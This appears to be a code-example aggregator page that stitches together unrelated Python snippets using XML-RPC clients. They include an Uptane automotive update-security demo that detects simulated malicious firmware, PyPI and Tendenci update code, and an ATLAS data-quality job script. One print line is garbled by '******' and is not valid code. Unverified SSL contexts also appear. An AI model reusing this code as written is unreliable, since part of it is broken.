            '; received: ' + repr(image_fname) + '; aborting "install".' +
            ENDCOLORS)
        # print_banner(
        #     BANNER_DEFENDED, color=WHITE+DARK_BLUE_BG,
        #     text='Image from Primary is not listed in trusted metadata. Possible '
        #     'attack from Primary averted. Image: ' +
        #     repr(image_fname))#, sound=TADA)
        attacks_detected += 'Received unexpected image from Primary with ' + \
            'unexpected filename.\n'
        generate_signed_ecu_manifest()
        submit_ecu_manifest_to_primary()
        return

    # Write the downloaded image binary data to disk.
    unverified_targets_dir = os.path.join(CLIENT_DIRECTORY,
                                          'unverified_targets')
    if not os.path.exists(unverified_targets_dir):
        os.mkdir(unverified_targets_dir)
    with open(os.path.join(unverified_targets_dir, image_fname), 'wb') as fobj:
        fobj.write(image.data)

    # Validate the image against the metadata.
    try:
        secondary_ecu.validate_image(image_fname)
    except tuf.DownloadLengthMismatchError:
        print_banner(
            BANNER_DEFENDED,
            color=WHITE + DARK_BLUE_BG,
            text=
            'Image from Primary failed to validate: length mismatch. Image: ' +
            repr(image_fname),
            sound=TADA)
        # TODO: Add length comparison instead, from error.
        attacks_detected += 'Image from Primary failed to validate: length ' + \
            'mismatch.\n'
        generate_signed_ecu_manifest()
        submit_ecu_manifest_to_primary()
        return
    except tuf.BadHashError:
        print_banner(
            BANNER_DEFENDED,
            color=WHITE + DARK_BLUE_BG,
            text='Image from Primary failed to validate: hash mismatch. Image: '
            + repr(image_fname),
            sound=TADA)
        # TODO: Add hash comparison instead, from error.
        attacks_detected += 'Image from Primary failed to validate: hash ' + \
            'mismatch.\n'
        generate_signed_ecu_manifest()
        submit_ecu_manifest_to_primary()
        return

    if secondary_ecu.firmware_fileinfo == expected_target_info:
        print_banner(
            BANNER_NO_UPDATE_NEEDED,
            color=WHITE + BLACK_BG,
            text=
            'We already have installed the firmware that the Director wants us '
            'to install. Image: ' + repr(image_fname))
        generate_signed_ecu_manifest()
        submit_ecu_manifest_to_primary()
        return

    # Inspect the contents of 'image_fname' and search for the string: "evil
    # content".  If this single string is found in any of the images downloaded,
    # print a BANNER_COMPROMISED banner.
    image_filepath = os.path.join(CLIENT_DIRECTORY, 'unverified_targets',
                                  image_fname)

    # Simulate installation. (If the demo eventually uses pictures to move into
    # place or something, here is where to do it.)
    # 1. Move the downloaded image from the unverified targets subdirectory to
    #    the root of the client directory.
    current_firmware_filepath = os.path.join(CLIENT_DIRECTORY, image_fname)

    if os.path.exists(current_firmware_filepath):
        os.remove(current_firmware_filepath)

    os.rename(image_filepath, current_firmware_filepath)

    # 2. Set the fileinfo in the secondary_ecu object to the target info for the
    #    new firmware.
    secondary_ecu.firmware_fileinfo = expected_target_info

    with open(current_firmware_filepath, 'rb') as file_object:
        if file_object.read() == b'evil content':
            # If every safeguard is defeated and a compromised update is delivered, a
            # real Secondary can't necessarily know it has been compromised, as every
            # check has passed. For the purposes of the demo, of course, we know when
            # a compromise has been delivered, and we'll flash a Compromised screen
            # to indicate a successful attack. We know this has happened because the
            # demo should include 'evil content' in the file.  This requires,
            # generally, a compromise of both Image Repo and Director keys.
            print_banner(
                BANNER_COMPROMISED,
                color=WHITE + RED_BG,
                text=
                'A malicious update has been installed! Arbitrary package attack '
                'successful: this Secondary has been compromised! Image: ' +
                repr(expected_image_fname),
                sound=WITCH)

        else:
            print_banner(
                BANNER_UPDATED,
                color=WHITE + GREEN_BG,
                text='Installed firmware received from Primary that was fully '
                'validated by the Director and Image Repo. Image: ' +
                repr(image_fname),
                sound=WON)

    if expected_target_info['filepath'].endswith('.txt'):
        print('The contents of the newly-installed firmware with filename ' +
              repr(expected_target_info['filepath']) + ' are:')
        print('---------------------------------------------------------')
        print(open(os.path.join(CLIENT_DIRECTORY, image_fname)).read())
        print('---------------------------------------------------------')

    # Submit info on what is currently installed back to the Primary.
    generate_signed_ecu_manifest()
    submit_ecu_manifest_to_primary()
Example #25
    def search(self, _query, options):
        index_url = options.index
        with self._build_session(options) as session:
            transport = PipXmlrpcTransport(index_url, session)
            pypi = xmlrpc_client.ServerProxy(index_url, transport)
            return pypi.search(self._spec, self._operator)
Example #26
    def __init__(self, model):
        super(PyPIClient, self).__init__(model)
        self.client = xmlrpc_client.ServerProxy(self.url)
        self.session = requests.Session()
Example #27
def connect(url, encoding='UTF-8', use_datetime=True, ssl_verify=True):
    context = None if ssl_verify else ssl._create_unverified_context()
    return xmlrpc.ServerProxy(url,
                              encoding=encoding,
                              use_datetime=use_datetime,
                              context=context)
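Passing ssl_verify=False builds an unverified SSL context, which disables certificate checking entirely, so it should only be used against endpoints you trust. A usage sketch with a placeholder URL, assuming the server supports standard XML-RPC introspection:

# Placeholder URL; listMethods() only works if the server enables introspection.
server = connect('https://xmlrpc.example.com/RPC2', ssl_verify=False)
print(server.system.listMethods())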
Example #28
    def handle(self, *args, **options):
        from tendenci.apps.site_settings.utils import get_setting

        pass_update_tendenci = False
        pass_update_tendenci_site = False
        is_uwsgi = False
        gunicorn_error_msg = None
        uwsgi_error_msg = None
        errors_list = []

        pypi = xmlrpc_client.ServerProxy('http://pypi.python.org/pypi')
        latest_version = pypi.package_releases('tendenci')[0]
        error_message = ""
        email_context = {
            'site_url': get_setting('site', 'global', 'siteurl'),
            'version': latest_version,
            'error_message': error_message
        }

        email_sender = get_setting(
            'site', 'global',
            'siteemailnoreplyaddress') or settings.DEFAULT_FROM_EMAIL
        email_recipient = ""
        user_id = options['user']
        if user_id and User.objects.filter(pk=user_id).exists():
            user = User.objects.get(pk=user_id)
            if user.email:
                email_recipient = user.email

        try:
            print("Updating tendenci")
            output = subprocess.check_output(
                "%s -m pip install -r requirements/tendenci.txt --upgrade" %
                python_executable(),
                stderr=subprocess.STDOUT,
                shell=True)
            print(output.decode())
            pass_update_tendenci = True

        except subprocess.CalledProcessError as e:
            errors_list.append(e.output.decode())

        # run deploy only if the tendenci update succeeded
        if pass_update_tendenci:
            try:
                print("Updating tendenci site")
                call_command('migrate')
                call_command('deploy')
                pass_update_tendenci_site = True
            except CommandError as e:
                errors_list.append(e.output)

        # run reload if update is done
        if pass_update_tendenci_site:
            try:
                print("Restarting Server")
                subprocess.check_output(
                    "sudo systemctl restart %s" %
                    os.path.basename(settings.PROJECT_ROOT),
                    stderr=subprocess.STDOUT,
                    shell=True)

            except subprocess.CalledProcessError as e:
                gunicorn_error_msg = e.output.decode()
                if "reload: Unknown job:" in e.output.decode():
                    is_uwsgi = True

        # run the uwsgi restart only if it turned out the site is using uwsgi instead
        if is_uwsgi:
            try:
                print("Restarting Server")
                subprocess.check_output(
                    "sudo touch /etc/uwsgi/vassals/%s.ini" %
                    os.path.basename(settings.PROJECT_ROOT),
                    stderr=subprocess.STDOUT,
                    shell=True)

            except subprocess.CalledProcessError as e:
                uwsgi_error_msg = e.output.decode()

        if gunicorn_error_msg and uwsgi_error_msg:
            errors_list.append(uwsgi_error_msg)
            errors_list.append(gunicorn_error_msg)

        try:
            print("Clearing cache")
            call_command('clear_cache')
        except CommandError as e:
            errors_list.append(e.output)

        email_context['errors_list'] = errors_list

        if email_recipient:
            subject = render_to_string(
                template_name='notification/update_tendenci_notice/short.txt',
                context=email_context)
            subject = subject.strip('\n').strip('\r')
            body = render_to_string(
                template_name='notification/update_tendenci_notice/full.html',
                context=email_context)
            email = EmailMessage()
            email.subject = subject
            email.body = body
            email.from_email = email_sender
            email.to = [email_recipient]
            email.content_subtype = 'html'
            email.send()
        else:
            for err in errors_list:
                print(err)
Example #29
def dq_combined_trf(picklefile):

    tstart = time.time()

    print(
        "\n##################################################################")
    print("##              ATLAS Tier-0 Offline DQM Processing             ##")
    print(
        "##################################################################\n")

    print(
        "\n##################################################################")
    print("## STEP 1: creating file with list of root files ...")
    print(
        "##################################################################\n")

    # extract parameters from pickle file
    print("Using pickled file ", picklefile, " for input parameters")
    f = open(picklefile, 'rb')  # pickle data must be read in binary mode on Python 3
    parmap = pickle.load(f)
    f.close()

    print("\nFull Tier-0 run options:\n")
    pprint.pprint(parmap)

    inputfilelist = parmap.get('inputHistFiles', [])
    nfiles = len(inputfilelist)
    histMergeCompressionLevel = parmap.get('histMergeCompressionLevel', 1)
    histMergeDebugLevel = parmap.get('histMergeDebugLevel', 0)

    if not nfiles:  # problem with job definition or reading pickle file
        dt = int(time.time() - tstart)
        retcode = 1
        acronym = 'TRF_NOINPUT'
        txt = 'empty input file list'
        reportmap = {
            'prodsys': {
                'trfCode': retcode,
                'trfAcronym': acronym,
                'jobOutputs': [],
                'jobInputs': [],
                'nevents': 0,
                'more': {
                    'num1': 0,
                    'num2': dt,
                    'txt1': txt
                }
            }
        }

    else:
        histtmpflist = []
        nevts = 0

        if isinstance(inputfilelist[0], str):
            histtmpdsname = (inputfilelist[0]).split('#')[0]
            for val in inputfilelist:
                histtmpflist.append(val.split('#')[1])

        elif isinstance(inputfilelist[0], dict):
            histtmpdsname = inputfilelist[0]['dsn']
            for fdict in inputfilelist:
                histtmpflist.append(fdict['lfn'])
                nevt = fdict.get('events', 0)
                if nevt is None:
                    nevt = 0
                    print(
                        "WARNING Can't get number of events from input pickle file"
                    )
                nevts += nevt

        f = open('hist_merge.list', 'w')
        txtstr = ""
        for hf in histtmpflist:
            txtstr += "%s\n" % hf
        f.write(txtstr)
        f.close()

        cmd = "cat hist_merge.list"
        (s, o) = getstatusoutput(cmd)
        print("\nContents of file hist_merge.list:\n")
        print(o)

        print(
            "\n##################################################################"
        )
        print("## STEP 2: determining job parameters...")
        print(
            "##################################################################\n"
        )

        # output file
        histdsname = (parmap['outputHistFile']).split('#')[0]
        histfile = (parmap['outputHistFile']).split('#')[1]
        amitag = histfile.split('.')[5]

        # incremental mode on/off
        incr = parmap.get('incrementalMode', 'False')

        # post-processing on/off
        postproc = parmap.get('postProcessing', 'True')

        # database uploading on/off
        allowCOOLUpload = parmap.get('allowCOOLUpload', 'True')

        # do web display
        doWebDisplay = parmap.get('doWebDisplay', 'True')

        # production mode
        productionMode = parmap.get('productionMode', 'True')
        if productionMode != 'True' and incr == 'True':
            print("Production mode is not True, turning off incremental mode")
            incr = 'False'

        # get file paths, put into environment vars
        filepaths = parmap.get('filepaths', None)
        if filepaths and isinstance(filepaths, dict):
            if 'basename' not in filepaths:
                print("Improperly formed 'filepaths' (no 'basename')")
            else:
                for evtclass in ('Collisions', 'Cosmics', 'HeavyIons'):
                    if evtclass not in filepaths:
                        print("Improperly formed 'filepaths' (no '%s')" %
                              evtclass)
                    else:
                        clinfo = filepaths[evtclass]
                        for timeclass in ('run', 'minutes10', 'minutes30'):
                            if timeclass not in clinfo:
                                print(
                                    "Improperly formed 'filepaths[%s]' (no '%s')"
                                    % (evtclass, timeclass))
                            else:
                                dqcenvvar = 'DQC_HCFG_%s_%s' % (
                                    evtclass.upper(), timeclass.upper())
                                fpath = os.path.join(filepaths['basename'],
                                                     clinfo[timeclass])
                                print("Setting %s = %s" % (dqcenvvar, fpath))
                                os.environ[dqcenvvar] = fpath

        # extract info from dataset name
        # AMI project name
        # override if tag has been specified in parmap
        try:
            dqproject = histdsname.split('.')[0]
        except:
            dqproject = 'data_test'
        dqproject = parmap.get('projectTag', dqproject)

        # run number
        if 'runNumber' in parmap:
            runnr = parmap['runNumber']
        else:
            try:
                runnr = int(histdsname.split('.')[1])
            except:
                runnr = 1234567890

        # stream name
        if 'streamName' in parmap:
            stream = parmap['streamName']
        else:
            try:
                stream = histdsname.split('.')[2]
            except:
                stream = 'test_dummy'

        # processing pass number
        MAX_XMLRPC_TRIES = 5
        if 'procNumber' in parmap:
            procnumber = parmap['procNumber']
        else:
            n_xmlrpc_tries = 1
            while n_xmlrpc_tries <= MAX_XMLRPC_TRIES:
                procnumber = 99
                try:
                    xmlrpcserver = xmlrpclib.ServerProxy(
                        'http://atlasdqm.cern.ch:8888')
                    procnumber = xmlrpcserver.get_next_proc_pass(
                        runnr, stream, 'tier0')
                    break
                except:
                    print('Web service connection failed, attempt',
                          n_xmlrpc_tries, 'of', MAX_XMLRPC_TRIES)
                    n_xmlrpc_tries += 1
                    if n_xmlrpc_tries <= MAX_XMLRPC_TRIES:
                        time.sleep(20 * 2**n_xmlrpc_tries)

        print("Job parameters:\n")
        print("  Run number:      ", runnr)
        print("  Stream name:     ", stream)
        print("  Processing pass: "******"  Incremental mode:", incr)
        print("  Post-processing: ", postproc)
        print("  COOL uploads:    ", allowCOOLUpload)
        print("  Production mode: ", productionMode)

        print(
            "\n##################################################################"
        )
        print("## STEP 3: running histogram merging procedure ...")
        print(
            "##################################################################\n"
        )

        # environment setting
        os.environ['DQPRODUCTION'] = '1' if productionMode == 'True' else '0'
        os.environ['DQ_STREAM'] = stream
        print("Setting env variable DQPRODUCTION to %s\n" %
              os.environ['DQPRODUCTION'])
        os.environ[
            'COOLUPLOADS'] = '1' if allowCOOLUpload == 'True' and productionMode == 'True' else '0'
        print("Setting env variable COOLUPLOADS to %s\n" %
              os.environ['COOLUPLOADS'])

        if postproc == 'True':
            if incr == 'True':
                cmd = "python -u `which DQHistogramMerge.py` hist_merge.list %s 1 1 %d %d " % (
                    histfile, histMergeCompressionLevel, histMergeDebugLevel)
            else:
                cmd = "python -u `which DQHistogramMerge.py` hist_merge.list %s 1 0 %d %d" % (
                    histfile, histMergeCompressionLevel, histMergeDebugLevel)
        else:
            cmd = "python -u `which DQHistogramMerge.py` hist_merge.list %s 0 0 %d %d" % (
                histfile, histMergeCompressionLevel, histMergeDebugLevel)

        print("Histogram merging command:\n")
        print(cmd)
        print(
            "\n##################################################################\n"
        )

        print("## ... logfile from DQHistogramMerge.py: ")
        print(
            "--------------------------------------------------------------------------------"
        )
        # execute command
        retcode1 = os.system(cmd)
        print(
            "--------------------------------------------------------------------------------"
        )
        t1 = time.time()
        dt1 = int(t1 - tstart)

        print("\n## DQHistogramMerge.py finished with retcode = %s" % retcode1)
        print("## ... elapsed time: ", dt1, " sec")

        if retcode1 == 0:
            if postproc == 'True' and incr == 'False':
                print(
                    "\n##################################################################"
                )
                print("## STEP 3b: copying postprocessing output to AFS ...")
                print(
                    "##################################################################\n"
                )

                cmd = "python -u `which DQFileMove.py` %s %s_%s_%s" % (
                    dqproject, runnr, stream, procnumber)

                print("File move command:\n")
                print(cmd)
                print(
                    "\n##################################################################\n"
                )

                print("## ... logfile from DQFileMove.py: ")
                print(
                    "--------------------------------------------------------------------------------"
                )
                # execute command
                retcode1b = os.system(cmd)
                print(
                    "--------------------------------------------------------------------------------"
                )
                t1b = time.time()
                dt1b = int(t1b - t1)
                t1 = t1b

                print("\n## DQFileMove.py finished with retcode = %s" %
                      retcode1b)
                print("## ... elapsed time: ", dt1b, " sec")

            if doWebDisplay == 'True':
                print(
                    "\n##################################################################"
                )
                print("## STEP 4: running web-display creation procedure ...")
                print(
                    "##################################################################\n"
                )

                cmd = "python -u `which DQWebDisplay.py` %s %s %s %s stream=%s" % (
                    histfile, dqproject, procnumber, incr, stream)

                print("Web display creation command:\n")
                print(cmd)
                print(
                    "\n##################################################################\n"
                )

                print("## ... logfile from DQWebDisplay.py: ")
                print(
                    "--------------------------------------------------------------------------------"
                )
                # execute command
                retcode2 = os.system(cmd)
                print(
                    'DO NOT REPORT "Error in TH1: cannot merge histograms" ERRORS! THESE ARE IRRELEVANT!'
                )
                print(
                    "--------------------------------------------------------------------------------"
                )
                t2 = time.time()
                dt2 = int(t2 - t1)

                print("\n## DQWebDisplay.py finished with retcode = %s" %
                      retcode2)
                print("## ... elapsed time: ", dt2, " sec")
            else:
                print(
                    "\n##################################################################"
                )
                print("## WEB DISPLAY CREATION SKIPPED BY USER REQUEST")
                print(
                    "##################################################################\n"
                )
                retcode2 = 0
                dt2 = 0

        print(
            "\n##################################################################"
        )
        print("## STEP 5: finishing the job ...")
        print(
            "##################################################################\n"
        )

        # assemble report gpickle file
        outfiles = []
        infiles = []

        retcode = 0
        acronym = 'OK'
        txt = 'trf finished OK'

        # get info for report gpickle file
        if retcode1 == 0:
            dt = dt1
            if (retcode2 >> 8) in (0, 5):
                # if success, or if unable to acquire cache lock
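                # os.system returns the raw wait status on POSIX, so the exit
                # code itself lives in the high byte; shifting right by 8 bits
                # recovers it before comparing against the allowed values.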
                histmap = getFileMap(histfile, histdsname, nevts=nevts)
                outfiles = [histmap]
                dt += dt2
                if doWebDisplay == 'True':
                    print('Publishing to message service')
                    publish_success_to_mq(runnr,
                                          dqproject,
                                          stream,
                                          incr=(incr == 'True'),
                                          ami=amitag,
                                          procpass=procnumber,
                                          hcfg=filepaths,
                                          isprod=(productionMode == 'True'))
                else:
                    print('Web display off, not publishing to message service')
            else:
                txt = 'DQWebDisplay.py execution problem'
                print("ERROR: DQWebDisplay.py execution problem!")
                retcode = retcode2
                acronym = 'TRF_DQMDISPLAY_EXE'
                with open('hist_merge.list', 'r') as infilelist:
                    for infname in infilelist:
                        genmd5sum(infname.rstrip(os.linesep))
                genmd5sum(histfile)
        else:
            print("ERROR: DQHistogramMerge.py execution problem!")
            retcode = retcode1
            acronym = 'TRF_DQMHISTMERGE_EXE'
            dt = 0
            txt = 'DQHistogramMerge.py execution problem'
            with open('hist_merge.list', 'r') as infilelist:
                for infname in infilelist:
                    genmd5sum(infname.rstrip(os.linesep))
            genmd5sum(histfile)
            DQResFile = "DQResourceUtilization.txt"
            if os.path.exists(DQResFile):
                print("dumping resource utilization log")
                with open(DQResFile) as resfile:
                    for resline in resfile:
                        print(resline, end=' ')

        # assemble job report map
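        # 'more' carries auxiliary fields read downstream: num1 = number of
        # processed events, num2 = elapsed wall-clock seconds, txt1 = a short
        # human-readable status string.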
        reportmap = {
            'prodsys': {
                'trfCode': retcode,
                'trfAcronym': acronym,
                'jobOutputs': outfiles,
                'jobInputs': infiles,
                'nevents': int(nevts),
                'more': {
                    'num1': int(nevts),
                    'num2': int(dt),
                    'txt1': txt
                }
            }
        }

    # pickle report map
    with open('jobReport.gpickle', 'wb') as f:  # binary mode, as required by pickle
        pickle.dump(reportmap, f)

    print("\n## ... job finished with retcode : %s" %
          reportmap['prodsys']['trfCode'])
    print("## ... error acronym: ", reportmap['prodsys']['trfAcronym'])
    print("## ... elapsed time: ", reportmap['prodsys']['more']['num2'], "sec")
    print("##")
    print("##################################################################")
    print("## End of job.")
    print(
        "##################################################################\n")
Ejemplo n.º 30
0
def update_cycle():
    """
  """

    I_TO_PRINT = TO_PRINT + uptane.YELLOW + '[update_cycle()]: ' + uptane.ENDCOLORS
    #TODO: Print to be deleted
    print(str('%s %s' % (I_TO_PRINT, 'Updating cycle')))
    #TODO: Until here

    #
    # FIRST: TIME
    #

    print(
        str('%s %s' % (
            I_TO_PRINT,
            'First, we\'ll send the Timeserver a request for a signed time, with the nonces Secondaries have sent us since last time.'
        )))

    # First, we'll send the Timeserver a request for a signed time, with the
    # nonces Secondaries have sent us since last time. (This also saves these
    # nonces as "sent" and empties the Primary's list of nonces to send.)
    nonces_to_send = primary_ecu.get_nonces_to_send_and_rotate()

    #TODO: Print to be deleted
    print(str('%s %s %s' % (I_TO_PRINT, 'nonces:', nonces_to_send)))
    #TODO: Until here

    tserver = xmlrpc_client.ServerProxy('http://' + str(demo.TIMESERVER_HOST) +
                                        ':' + str(demo.TIMESERVER_PORT))
    #if not tserver.system.listMethods():
    #  raise Exception('Unable to connect to the Timeserver.')

    print('Submitting a request for a signed time to the Timeserver.')

    #TODO: Print to be deleted
    print(
        str('%s %s %s' % (
            I_TO_PRINT,
            'Sending get_signed_time_der/get_signed_time XML-RPC request to TIMESERVER on port:',
            demo.TIMESERVER_PORT)))
    #TODO: Until here

    if tuf.conf.METADATA_FORMAT == 'der':  # TODO: Should check setting in Uptane.
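        # The DER variant is expected to come back as an XML-RPC Binary object,
        # so .data below unwraps the raw DER bytes (an assumption based on how
        # XML-RPC transports binary payloads; it is not shown in this snippet).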
        time_attestation = tserver.get_signed_time_der(nonces_to_send).data

    else:
        time_attestation = tserver.get_signed_time(nonces_to_send)

    # At this point, time_attestation might be a simple Python dictionary or
    # a DER-encoded ASN.1 representation of one.

    #TODO: Print to be deleted
    print(
        str('%s %s' % (
            I_TO_PRINT,
            'Updating time for Primary_ECU with time_attestation received from the server'
        )))
    #TODO: Until here

    # This validates the attestation and also saves the time therein (if the
    # attestation was valid), causing this client to use that time for future
    # metadata expiration checks. Secondaries can request this from the Primary
    # at will.
    primary_ecu.update_time(time_attestation)

    #TODO: Print to be deleted
    print(
        str('%s %s' %
            (I_TO_PRINT, 'Time attestation validated. New time registered.')))
    #TODO: Until here

    print('Time attestation validated. New time registered.')

    #TODO: Print to be deleted
    print(
        str('%s %s' %
            (I_TO_PRINT, 'Starting DOWNLOADING METADATA AND IMAGES PROCESS')))
    #TODO: Until here

    #
    # SECOND: DOWNLOAD METADATA AND IMAGES
    #

    # Starting with just the root.json files for the Director and Image Repos, and
    # pinned.json, the client will now use TUF to connect to each repository and
    # download/update top-level metadata. This call updates metadata from both
    # repositories.
    # upd.refresh()
    print(GREEN + '\n')
    print(' Now updating top-level metadata from the Director and Image '
          'Repositories\n    (timestamp, snapshot, root, targets)\n' +
          ENDCOLORS)

    # This will update the Primary's metadata and download images from the
    # Director and Image Repositories, and create a mapping of assignments from
    # each Secondary ECU to its Director-intended target.
    try:
        primary_ecu.primary_update_cycle()

    # Print a REPLAY or DEFENDED banner if ReplayedMetadataError or
    # BadSignatureError is raised by primary_update_cycle().  These banners are
    # only triggered for bad Timestamp metadata, and all other exceptions are
    # re-raised.
    except tuf.NoWorkingMirrorError as exception:
        director_file = os.path.join(_vin, 'metadata',
                                     'timestamp' + demo.METADATA_EXTENSION)
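        # NoWorkingMirrorError collects one exception per mirror: mirror_errors
        # maps each mirror URL to the error raised while contacting it.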
        for mirror_url in exception.mirror_errors:
            if mirror_url.endswith(director_file):
                if isinstance(exception.mirror_errors[mirror_url],
                              tuf.ReplayedMetadataError):
                    print_banner(
                        BANNER_REPLAY,
                        color=WHITE + BLACK_BG,
                        text=
                        'The Director has instructed us to download a Timestamp'
                        ' that is older than the currently trusted version. This'
                        ' instruction has been rejected.',
                        sound=TADA)

                elif isinstance(exception.mirror_errors[mirror_url],
                                tuf.BadSignatureError):
                    print_banner(
                        BANNER_DEFENDED,
                        color=WHITE + DARK_BLUE_BG,
                        text=
                        'The Director has instructed us to download a Timestamp'
                        ' that is signed with keys that are untrusted.  This metadata has'
                        ' been rejected.',
                        sound=TADA)

                else:
                    raise

    # All targets have now been downloaded.

    # Generate and submit vehicle manifest.
    generate_signed_vehicle_manifest()
    submit_vehicle_manifest_to_director()

    #TODO: Print to be deleted
    print(str('%s %s' % (I_TO_PRINT, 'Returning...')))
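    # Usage note (not part of the demo code): this cycle is normally invoked
    # repeatedly, e.g. from a simple driver loop; the interval below is an
    # assumption chosen purely for illustration:
    #
    #     while True:
    #         update_cycle()
    #         time.sleep(300)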